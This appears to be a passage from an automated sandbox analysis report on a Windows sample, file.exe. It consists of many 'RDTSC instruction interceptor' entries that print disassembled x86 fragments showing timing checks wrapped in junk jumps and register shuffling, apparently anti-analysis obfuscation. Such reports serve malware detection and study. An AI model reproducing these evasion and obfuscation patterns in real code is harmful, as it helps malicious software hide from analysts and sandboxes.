                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70997C second address: 709993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709993 second address: 709997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709997 second address: 7099A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7099A0 second address: 7099D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A5h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jc 00007F79113F07A7h 0x00000013 jmp 00007F79113F07A1h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7099D8 second address: 7099E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1197B second address: 4A11996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F07A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11996 second address: 4A119C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, 342Eh 0x00000013 push ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119C0 second address: 4A119C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119C6 second address: 4A119CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0952 second address: 49B0956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0956 second address: 49B095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B095A second address: 49B0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06A8 second address: 49E06AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06AC second address: 49E06BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06BA second address: 49E076B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F79111F4F06h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ebx, 540C1CE2h 0x00000017 mov edx, 36D3252Eh 0x0000001c popad 0x0000001d pushfd 0x0000001e jmp 00007F79111F4EFFh 0x00000023 jmp 00007F79111F4F03h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F79111F4F04h 0x00000032 and si, 8DD8h 0x00000037 jmp 00007F79111F4EFBh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F79111F4F08h 0x00000043 adc al, 00000038h 0x00000046 jmp 00007F79111F4EFBh 0x0000004b popfd 0x0000004c popad 0x0000004d mov ebp, esp 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 mov ah, 5Fh 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E076B second address: 49E0793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a push dword ptr [ebp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F79113F07A1h 0x00000015 pop ecx 0x00000016 mov edx, 3A4A8274h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0793 second address: 49E07DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F79111F4F04h 0x0000000b add ax, 1428h 0x00000010 jmp 00007F79111F4EFBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F79111F4F05h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0820 second address: 49E0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0826 second address: 49E06A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b push 00401BF4h 0x00000010 push edi 0x00000011 mov dword ptr [0045F81Ch], eax 0x00000016 call esi 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C6B second address: 49C0C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C70 second address: 49C0C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F00h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C84 second address: 49C0C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C88 second address: 49C0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C97 second address: 49C0C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C9D second address: 49C0CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA3 second address: 49C0CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA7 second address: 49C0CC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79111F4F05h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CC9 second address: 49C0DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A7h 0x00000008 pushfd 0x00000009 jmp 00007F79113F07A8h 0x0000000e xor esi, 380A6F38h 0x00000014 jmp 00007F79113F079Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F79113F07A4h 0x00000026 sub si, E998h 0x0000002b jmp 00007F79113F079Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F79113F07A8h 0x00000037 sbb esi, 68DE13F8h 0x0000003d jmp 00007F79113F079Bh 0x00000042 popfd 0x00000043 popad 0x00000044 pop ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F79113F079Bh 0x0000004e adc ecx, 01967FBEh 0x00000054 jmp 00007F79113F07A9h 0x00000059 popfd 0x0000005a pushfd 0x0000005b jmp 00007F79113F07A0h 0x00000060 xor ecx, 684478B8h 0x00000066 jmp 00007F79113F079Bh 0x0000006b popfd 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DBA second address: 4A11660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov bh, 1Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp dword ptr [74E51560h] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push esi 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push edi 0x0000001b mov edi, dword ptr fs:[00000018h] 0x00000022 cmp esi, 40h 0x00000025 jnc 00007F79111F4F07h 0x00000027 mov eax, dword ptr [ebp+0Ch] 0x0000002a mov dword ptr [edi+esi*4+00000E10h], eax 0x00000031 mov eax, 00000001h 0x00000036 pop edi 0x00000037 pop esi 0x00000038 pop ebp 0x00000039 retn 0008h 0x0000003c test eax, eax 0x0000003e je 00007F79111F4FB1h 0x00000044 call 00007F79111F3421h 0x00000049 mov edi, edi 0x0000004b push esi 0x0000004c call 00007F79111F6551h 0x00000051 push 00000000h 0x00000053 call 00007F79111F4E7Ch 0x00000058 mov edi, edi 0x0000005a push ebp 0x0000005b mov ebp, esp 0x0000005d push esi 0x0000005e push dword ptr [00459714h] 0x00000064 mov esi, dword ptr [00401128h] 0x0000006a call esi 0x0000006c mov edi, edi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F79111F4F03h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11660 second address: 4A116A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F79113F079Fh 0x00000008 pop ecx 0x00000009 call 00007F79113F07A9h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F79113F07A3h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116A6 second address: 4A116C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79111F4EFFh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116C7 second address: 4A116CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116CB second address: 4A116D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0776 second address: 49A077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A077C second address: 49A0780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0780 second address: 49A079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d mov di, 9FB6h 0x00000011 popad 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A079A second address: 49A07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 9BCBh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07A3 second address: 49A07EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F79113F07A8h 0x00000014 and ax, CD38h 0x00000019 jmp 00007F79113F079Bh 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07EB second address: 49A0810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, E5h 0x00000005 mov ecx, 1DCAE103h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d inc eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F79111F4F05h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0810 second address: 49A084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov bx, 485Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lock xadd dword ptr [ecx], eax 0x00000010 jmp 00007F79113F07A5h 0x00000015 inc eax 0x00000016 jmp 00007F79113F079Eh 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, di 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A084E second address: 49A0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0854 second address: 49A0858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100F5 second address: 4A1013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79111F4F01h 0x00000009 sub esi, 0BD63026h 0x0000000f jmp 00007F79111F4F01h 0x00000014 popfd 0x00000015 jmp 00007F79111F4F00h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1013C second address: 4A10140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10140 second address: 4A1015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1015D second address: 4A101D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d mov ecx, 6DA607B3h 0x00000012 mov si, 6C0Fh 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 mov si, CE07h 0x0000001d mov bh, ch 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F79113F07A6h 0x00000026 xchg eax, esi 0x00000027 jmp 00007F79113F07A0h 0x0000002c mov esi, dword ptr [74E806ECh] 0x00000032 jmp 00007F79113F07A0h 0x00000037 test esi, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F79113F079Ah 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101D7 second address: 4A101DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101DD second address: 4A10230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F79113F159Ah 0x0000000f jmp 00007F79113F07A0h 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F79113F079Dh 0x0000001e sub cx, E1C6h 0x00000023 jmp 00007F79113F07A1h 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10230 second address: 4A10235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10235 second address: 4A102A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007F79113F07A2h 0x00000011 pop esi 0x00000012 mov dh, C4h 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 jmp 00007F79113F079Ah 0x0000001b call dword ptr [74E50B60h] 0x00000021 mov eax, 750BE5E0h 0x00000026 ret 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F79113F079Dh 0x00000030 and ah, FFFFFFE6h 0x00000033 jmp 00007F79113F07A1h 0x00000038 popfd 0x00000039 mov edi, eax 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102A3 second address: 4A10306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F79111F4F03h 0x00000012 and ah, FFFFFFCEh 0x00000015 jmp 00007F79111F4F09h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F79111F4F08h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10306 second address: 4A1030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1030A second address: 4A10310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10310 second address: 4A103A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1F1BB253h 0x00000008 mov bx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 push esi 0x00000011 mov edx, 621FAFF2h 0x00000016 pop edx 0x00000017 mov ax, 939Fh 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e mov bx, D216h 0x00000022 call 00007F79113F07A7h 0x00000027 mov ax, 4D7Fh 0x0000002b pop ecx 0x0000002c popad 0x0000002d xchg eax, edi 0x0000002e jmp 00007F79113F079Bh 0x00000033 push dword ptr [eax] 0x00000035 jmp 00007F79113F07A6h 0x0000003a mov eax, dword ptr fs:[00000030h] 0x00000040 jmp 00007F79113F07A0h 0x00000045 push dword ptr [eax+18h] 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F79113F07A7h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1042A second address: 4A10488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F79815E4157h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F79111F4F03h 0x00000018 or eax, 7FCDB8EEh 0x0000001e jmp 00007F79111F4F09h 0x00000023 popfd 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10488 second address: 4A104B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79113F07A9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104B8 second address: 4A104BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104BE second address: 4A104D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F07A3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104D5 second address: 4A104F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a pushad 0x0000000b mov ebx, 7E4513E6h 0x00000010 popad 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104F1 second address: 4A104F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104F6 second address: 4A10513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10513 second address: 4A105FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007F79113F07A3h 0x00000015 pop eax 0x00000016 movsx edi, cx 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F79113F07A0h 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 jmp 00007F79113F07A0h 0x0000002a mov dword ptr [esi+10h], eax 0x0000002d pushad 0x0000002e mov dh, ah 0x00000030 pushfd 0x00000031 jmp 00007F79113F07A3h 0x00000036 xor cl, FFFFFFEEh 0x00000039 jmp 00007F79113F07A9h 0x0000003e popfd 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+50h] 0x00000043 jmp 00007F79113F079Eh 0x00000048 mov dword ptr [esi+14h], eax 0x0000004b pushad 0x0000004c mov edi, 0CD5A780h 0x00000051 popad 0x00000052 mov eax, dword ptr [ebx+54h] 0x00000055 pushad 0x00000056 mov dl, E6h 0x00000058 mov di, ax 0x0000005b popad 0x0000005c mov dword ptr [esi+18h], eax 0x0000005f pushad 0x00000060 mov ebx, eax 0x00000062 jmp 00007F79113F07A2h 0x00000067 popad 0x00000068 mov eax, dword ptr [ebx+58h] 0x0000006b jmp 00007F79113F07A0h 0x00000070 mov dword ptr [esi+1Ch], eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 mov ebx, ecx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A105FE second address: 4A10649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, si 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+5Ch] 0x00000010 jmp 00007F79111F4EFCh 0x00000015 mov dword ptr [esi+20h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F79111F4F07h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10649 second address: 4A10666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007F79113F079Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10666 second address: 4A10681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10681 second address: 4A106A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106A7 second address: 4A106AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106AB second address: 4A106AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106AF second address: 4A106B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106B5 second address: 4A106BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106BA second address: 4A106EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F79111F4EFEh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+64h] 0x00000010 jmp 00007F79111F4F01h 0x00000015 mov dword ptr [esi+28h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a mov cx, 38B9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
